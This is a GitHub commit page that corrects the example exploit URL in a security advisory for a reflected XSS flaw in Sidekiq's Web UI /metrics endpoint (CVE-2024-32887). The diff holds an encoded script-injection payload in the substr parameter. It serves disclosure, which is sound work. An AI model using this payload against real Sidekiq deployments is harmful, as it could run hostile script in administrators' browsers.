Skip to content

Commit

Permalink
Correct example reflected XSS exploit URL.
Browse files Browse the repository at this point in the history
  • Loading branch information
@postmodern
postmodern committed Apr 27, 2024
1 parent bc3e9f0 commit e97ec3f
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion gems/sidekiq/CVE-2024-32887.yml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ description: |
Reflected XSS in Sidekiq Web UI via the `/metrics` HTTP end-point and the
`substr` query param:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E
cvss_v3: 5.5
unaffected_versions:
Expand Down

0 comments on commit e97ec3f

Please sign in to comment.